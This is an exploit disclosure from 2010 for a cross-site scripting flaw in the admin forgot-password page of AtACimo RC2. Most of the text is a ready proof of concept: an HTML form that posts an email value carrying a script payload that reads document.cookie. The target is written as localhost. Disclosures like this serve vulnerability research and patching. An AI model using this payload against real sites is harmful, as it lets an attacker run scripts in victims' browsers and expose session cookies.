# Exploit Title: [AtACimo RC2 (index.php) XSS Vulnerability]
# Date: [2010-02-25]
# Author: [sniper ip]
# Software Link: [http://atacimo.com/media/download_gallery/AtACimo%20RC2.zip]
# Version: [AtACimo RC2]
# Tested on: [no]
# CVE : [no]
# Code :


http://127.0.0.1/AtACimo/admin/login/forgot/index.php


<html>
<!--! By sniper ip & Mr.Sohayl !-->
<form name="forgot_pass" action="http://127.0.0.1/AtACimo/admin/login/forgot/index.php" method="post">
<input type="text" maxlength="255" name="email" value=""><script>alert(document.cookie);</script>" style="width: 315;height:22" size="1" />
<input class="button" type="submit" name="submit" value="Send Details" >
</html>
</form>